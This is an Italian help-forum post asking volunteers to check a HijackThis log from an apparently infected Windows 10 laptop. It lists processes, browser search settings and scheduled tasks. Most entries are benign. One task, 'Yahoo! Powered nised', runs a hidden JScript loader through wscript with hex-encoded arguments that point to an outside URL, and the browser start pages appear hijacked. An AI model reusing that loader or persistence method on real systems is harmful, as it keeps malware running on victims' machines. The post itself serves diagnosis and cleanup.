Importante Richiesta controllo Logfile of HijackThis

[ERCOLINO]

[3.4.0.17 Beta] - Jan 16, 2025
- Updated database of O4.
- Check if BootExecute is missing or empty.
- Step towards unifying the addition of new keys to open possibility moving them to the database.
- Fixed a bug with the inability to clear value of the REG_MULTI_SZ type, previously they were just deleted

 

[uno_a_caso]

Ciao, date un occhiate anche qui? Grazie

Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.31

Platform: x64 Windows 10 (Home), 10.0.19045.5487 (ReleaseId: 2009, 22H2), Service Pack: 0
Time: 15.02.2025 - 16:19 (UTC+01:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Memory: 3173 MiB Free (61 %). CPU Loading: (5 %)
Elevated: Yes
Ran by: mf (group: Administrators) on MF-PC, FirstRun: no

Chrome: 133.0.6943.98
Internet Explorer: 11.0.19041.4355
Default: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument %1 (Microsoft Edge)

Boot mode: Normal

Running processes:
Number | Path
1 C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
1 C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
1 C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
1 C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
1 C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x64\QuickGesture64.exe
1 C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x86\QuickGesture.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
1 C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
1 C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnSrv.exe
1 C:\Program Files (x86)\ASUS\InstantOn for NB\InsOnWMI.exe
1 C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
1 C:\Program Files (x86)\ASUS\Wireless Console 3\wcourier.exe
13 C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe
1 C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowserProtect.exe
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
2 C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
1 C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
10 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
1 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
1 C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
1 C:\Program Files (x86)\Leica Geosystems\Cyclone\CyraLicense.exe
1 C:\Program Files (x86)\Leica Geosystems\Cyclone\FastObjectsServer.exe
1 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
1 C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
1 C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE
1 C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
7 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
1 C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
6 C:\Program Files (x86)\Microsoft\EdgeWebView\Application\133.0.3065.59\msedgewebview2.exe
1 C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
1 C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
2 C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
1 C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
1 C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
1 C:\Program Files\ASUS\P4G\BatteryLife.exe
1 C:\Program Files\AVAST Software\Avast\aswEngSrv.exe
1 C:\Program Files\AVAST Software\Avast\aswidsagent.exe
1 C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe
1 C:\Program Files\AVAST Software\Avast\AvastNM.exe
1 C:\Program Files\AVAST Software\Avast\AvastSvc.exe
1 C:\Program Files\AVAST Software\Avast\AvastUI.exe
1 C:\Program Files\AVAST Software\Avast\wsc_proxy.exe
1 C:\Program Files\CCleaner\CCleaner64.exe
1 C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
1 C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe
1 C:\Program Files\Intel\iCLS Client\HeciServer.exe
2 C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
1 C:\Program Files\Windows Defender\MsMpEng.exe
1 C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2504.2.0_x64__cv1g1gvanyjgm\WhatsApp.exe
1 C:\Users\mf\Desktop\HiJackThis\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\System32\AggregatorHost.exe
1 C:\Windows\System32\ApplicationFrameHost.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\backgroundTaskHost.exe
1 C:\Windows\System32\CastSrv.exe
1 C:\Windows\System32\cmd.exe
2 C:\Windows\System32\CompatTelRunner.exe
2 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\dwm.exe
1 C:\Windows\System32\FBAgent.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\lsass.exe
2 C:\Windows\System32\notepad.exe
2 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
2 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smartscreen.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
78 C:\Windows\System32\svchost.exe
2 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\unsecapp.exe
2 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
2 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://www.google.com/?trackid=sp-006
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://www.google.com/search?trackid=sp-006&q={searchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://it.search.yahoo.com/yhs/web...y_soverj_00_00&os_ver=10.0&os=Windows+10+Home
R0 - HKLM\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://it.search.yahoo.com/yhs/web...y_soverj_00_00&os_ver=10.0&os=Windows+10+Home
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f}: [SuggestionsURLFallback] = http://clients5.google.com/complete/search?q={searchTerms}&hl={language}&gl={language}&client=ie8&mw={ie:maxWidth}&sh={ie:sectionHeight}&rh={ie:rowHeight}&inputencoding={inputEncoding}&outputencoding={outputEncoding} - Google
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f}: = https://www.google.com/search?tr...asks\OfficeSoftwareProtectionPlatform (empty)

 

[uno_a_caso]

O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2656A780-720E-4E0B-9A30-048C0284DE86} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{293B9ACB-DB3C-4CA2-B6A6-48728505916E} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43846AAA-9B88-40DD-B984-946F0BE4FC5B} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{43F606A6-6669-4580-8D1D-AD50DC99C03C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5A084105-D931-4010-8FFB-0577052329C8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5BC695F3-FEF4-4547-9CF5-EFB2F33C017E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{607E4B0E-67B1-4BEC-9C6A-961424A91DD1} - (no key)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{607E4B0E-67B1-4BEC-9C6A-961424A91DD1} - \Microsoft\Windows\UNP\RunCampaignManager (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AABBF655-70FF-4744-A924-C2767758A259} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AF5C64F5-F103-4C4A-B6A5-E4F7685CC07E} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9A54542-CF68-41BC-8A4F-D10515D370EC} - \Microsoft\Windows\Setup\gwx\launchtrayprocess (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CA1CC55C-36A6-4F5B-A210-1593D897EE4E} - \OfficeSoftwareProtectionPlatform\SvcRestartTask (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D9E3F6F1-BA68-4A1C-9716-E4647503D4C8} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E61B1ED0-259A-4C4D-911C-90F41D0140ED} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig (no xml)
O22 - Tasks: (damaged) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (Microsoft) (user missing)
O22 - Tasks: (damaged) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -foScheduledTelemetryRun (Microsoft) (user missing)
O22 - Tasks: (disabled) \Agent Activation Runtime\S-1-5-21-1232614349-1706152515-3375908610-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\WINDOWS\System32\Autopilot.dll (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\WINDOWS\System32\Autopilot.dll (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\Media Center\PeriodicScanRetry - C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (file missing)
O22 - Tasks: (disabled) \Microsoft\Windows\Media Center\RecordingRestart - C:\WINDOWS\ehome\ehrec /RestartRecording (file missing)
O22 - Tasks: (disabled) \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor - {EA9155A3-8A39-40B4-8963-D3C761B18371} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\WindowsParentalControls - {DFA14C43-F385-4170-99CC-1B7765FA0E4A} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\Shell\WindowsParentalControlsMigration - {343D770D-7788-47C2-B62A-B7C4CED925CB} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\SideShow\AutoWake - {E51DFD48-AA36-4B45-BB52-E831F02E8316} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\SideShow\SessionAgent - {45F26E9E-6199-477F-85DA-AF1EDFE067B1} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\SideShow\SystemDataProviders - {7CCA6768-8373-4D28-8876-83E8B4E3A969} - (no file)
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Tasks: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Tasks: (disabled) Adobe Acrobat Update Task - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
O22 - Tasks: (disabled) ASUS Live Update - C:\Program Files (x86)\ASUS\ASUS Live Update\LiveUpdate.exe
O22 - Tasks: (disabled) ASUS P4G - C:\Program Files\ASUS\P4G\BatteryLife.exe
O22 - Tasks: (disabled) ASUS Quick Gesture - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x86\QuickGesture.exe
O22 - Tasks: (disabled) ASUS Quick Gesture (x64) - C:\Program Files (x86)\ASUS\ASUS Virtual Touch\QuickGesture\x64\QuickGesture64.exe
O22 - Tasks: (disabled) ASUS Smart Gesture Launcher - C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe
O22 - Tasks: (disabled) ASUS USB Charger Plus - C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
O22 - Tasks: (disabled) ATKOSD2 - C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
O22 - Tasks: (disabled) ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller winlogon-impersonate
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:aemarebackup.dll -f:BackupMareData (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\MareBackup - C:\WINDOWS\system32\compattelrunner.exe -m:appraiser.dll -foScheduledTelemetryRun (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Tasks: (telemetry) \Microsoft\Windows\Application Experience\PcaWallpaperAppDetect - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaWallpaperAppDetect (Microsoft)
O22 - Tasks: \AVAST Software\Avast Emergency Update - C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe
O22 - Tasks: \AVAST Software\Overseer - C:\Program Files\Common Files\avast software\overseer\overseer.exe /from_scheduler:1
O22 - Tasks: \GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem134.0.6985.0{8B5655A9-14C8-47D3-AEA0-A35D2FFD2B11} - C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\updater.exe --wake --system
O22 - Tasks: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Tasks: \Microsoft\Windows\AppListBackup\BackupNonMaintenance - {E0DCC2CC-3354-45F2-8914-519E07809082} - C:\WINDOWS\system32\AppListBackupLauncher.dll (Microsoft)
O22 - Tasks: \Microsoft\Windows\AppxDeploymentClient\UCPD velocity - C:\WINDOWS\system32\UCPDMgr.exe (Microsoft)
O22 - Tasks: \Microsoft\Windows\Clip\ClipESU - C:\WINDOWS\system32\clipesu.exe (Microsoft)
O22 - Tasks: \Microsoft\Windows\CloudRestore\Backup - {722D0F89-B69C-4700-AE8C-4A44350E4876},$(Arg0) - C:\WINDOWS\System32\CloudRestoreLauncher.dll (Microsoft)
O22 - Tasks: \Microsoft\Windows\ConsentUX\UnifiedConsent\UnifiedConsentSyncTask - {82aa0895-198a-4c1b-b2d1-c16894218afb} - C:\WINDOWS\System32\unifiedconsent.dll (Microsoft)
O22 - Tasks: \Microsoft\Windows\Media Center\ActivateWindowsSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ConfigureInternetTimeService - C:\WINDOWS\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\DispatchRecoveryTasks - C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ehDRMInit - C:\WINDOWS\ehome\ehPrivJob.exe /DRMInit (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\InstallPlayReady - C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\mcupdate - C:\WINDOWS\ehome\mcupdate $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\mcupdate_scheduled - C:\WINDOWS\ehome\mcupdate -crl -hms -pscn 15 (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\MediaCenterRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\OCURActivate - C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\OCURDiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PBDADiscovery - C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PBDADiscoveryW1 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PBDADiscoveryW2 - C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PvrRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\PvrScheduleTask - C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\RegisterSearch - C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\ReindexSearchRoot - C:\WINDOWS\ehome\ehPrivJob.exe /DoReindexSearchRoot (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\SqlLiteRecoveryTask - C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (file missing)
O22 - Tasks: \Microsoft\Windows\Media Center\UpdateRecordPath - C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (file missing)
O22 - Tasks: \Microsoft\Windows\MobilePC\HotStart - {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - (no file)
O22 - Tasks: \Microsoft\Windows\SideShow\GadgetManager - {FF87090D-4A9A-4F47-879B-29A80C355D61},$(Arg0) - (no file)
O22 - Tasks: \Microsoft\Windows\TabletPC\InputPersonalization - C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe (Microsoft)
O22 - Tasks: \Microsoft\Windows\Tcpip\IpAddressConflict1 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (Microsoft)
O22 - Tasks: \Microsoft\Windows\Tcpip\IpAddressConflict2 - C:\WINDOWS\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (Microsoft)
O22 - Tasks: \Microsoft\Windows\UpdateOrchestrator\StartOobeAppsScan_OobeAppReady - C:\WINDOWS\system32\usoclient.exe StartOobeAppsScan (Microsoft)
O22 - Tasks: \Microsoft\Windows\WindowsUpdate\Refresh Group Policy Cache - {07369A67-07A6-4608-ABEA-379491CB7C46} - C:\Windows\System32\UpdatePolicy.dll (Microsoft)
O22 - Tasks: {085E5AE1-682E-4941-8059-CC6CEDDE3C29} - C:\WINDOWS\system32\pcalua.exe -a "C:\Users\mf\Downloads\eMule0.50a-Installer (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {12BD7B1A-6388-4013-8AC1-1883FE47F70D} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.7.59.102/it/abandoninstall?page=tsProgressBar (file missing)
O22 - Tasks: {3C468AAC-74FF-4747-B9D1-910275B1F460} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (1).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {595F7578-6091-4104-8C2C-3638A55FCA14} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.7.0.102&LastError=12002 (file missing)
O22 - Tasks: {865AE5AF-4CD1-4557-B379-1514C9E2B671} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (5).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {9783570B-C119-497B-9666-089FCACD6DAA} - C:\Windows\system32\pcalua.exe -a C:\Users\mf\Desktop\HiJackThis.exe -d C:\Users\mf\Desktop
O22 - Tasks: {B618187F-895E-4717-A6A2-8CBAD7BF869E} - c:\program files (x86)\mozilla firefox\firefox.exe http://ui.skype.com/ui/0/6.6.0.106/it/abandoninstall?source=lightinstaller&page=tsInstall (file missing)
O22 - Tasks: {C6509AC9-3829-4877-9816-6D7412C5D865} - C:\Windows\system32\pcalua.exe -a "C:\Users\mf\Downloads\epson324826eu (2).exe" -d C:\Users\mf\Downloads
O22 - Tasks: {F77EE82F-C7C7-45A3-8AF5-781029F12F97} - c:\program files (x86)\mozilla firefox\firefox.exe http://www.skype.com/go/downloading?source=lightinstaller&ver=6.11.0.102&LastError=12002 (file missing)
O22 - Tasks: Avast Secure Browser Heartbeat Task (Hourly) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --hourly
O22 - Tasks: Avast Secure Browser Heartbeat Task (Logon) - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowser.exe --type=heartbeat --logon
O22 - Tasks: avastBCLRestartS-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Program Files (x86)\Mozilla Firefox\firefox.exe (file missing)
O22 - Tasks: AvastBrowserProtectS-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Program Files (x86)\AVAST Software\Browser\Application\AvastBrowserProtect.exe --runonce
O22 - Tasks: AvastUpdateTaskMachineCore - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /c
O22 - Tasks: AvastUpdateTaskMachineUA - C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe /ua /installsource scheduler
O22 - Tasks: CCleaner Update - C:\Program Files\CCleaner\CCUpdate.exe
O22 - Tasks: CCleanerCrashReporting - C:\Program Files\CCleaner\CCleanerBugReport.exe --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --guid "8f20d0c8-27ca-4baa-89ab-59f35e93c5d7" --version "6.32.0.11432" --silent
O22 - Tasks: CCleanerSkipUAC - mf - C:\Program Files\CCleaner\CCleaner.exe $(Arg0)
O22 - Tasks: Digital Sites - C:\Users\mf\AppData\Roaming\DIGITA~1\UPDATE~1\UPDATE~1.EXE /Check (file missing)
O22 - Tasks: GarminUpdaterTask - C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe
O22 - Tasks: ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d - C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe --domain-id 4e00205a-2ab1-4423-8f77-cc25b82cde1d --caller scheduler-impersonate
O22 - Tasks: LaunchSignup - C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe frompopup (file missing)
O22 - Tasks: OneDrive Reporting Task-S-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Users\mf\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Tasks: OneDrive Startup Task-S-1-5-21-1232614349-1706152515-3375908610-1001 - C:\Users\mf\AppData\Local\Microsoft\OneDrive\25.005.0112.0003\OneDriveLauncher.exe /startInstances
O22 - Tasks: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe (file missing)
O22 - Tasks: Yahoo! Powered nised - C:\WINDOWS\system32\wscript.exe "C:\ProgramData\{7015B576-FA57-3FB0-7C91-A1F2E6D32A3C}\timo.txt" "687474703a2f2f7761676e672e636f6d" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c726f6465646f" "433a5c50726f6772616d446174615c7b37303135423537362d464135372d334642302d374339312d4131463245364433324133437d5c7261726f6c6963" "//B" "//E:jscript" "--IsErIk"
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Media Center\PeriodicScanRetry - C:\WINDOWS\ehome\MCUpdate.exe -pscn 0 (file missing)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Media Center\RecordingRestart - C:\WINDOWS\ehome\ehrec /RestartRecording (file missing)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor - {EA9155A3-8A39-40B4-8963-D3C761B18371} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Shell\WindowsParentalControls - {DFA14C43-F385-4170-99CC-1B7765FA0E4A} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\Shell\WindowsParentalControlsMigration - {343D770D-7788-47C2-B62A-B7C4CED925CB} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\SideShow\AutoWake - {E51DFD48-AA36-4B45-BB52-E831F02E8316} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\SideShow\SessionAgent - {45F26E9E-6199-477F-85DA-AF1EDFE067B1} - (no file)
O22 - Tasks_Migrated: (disabled) \Microsoft\Windows\SideShow\SystemDataProviders - {7CCA6768-8373-4D28-8876-83E8B4E3A969} - (no file)
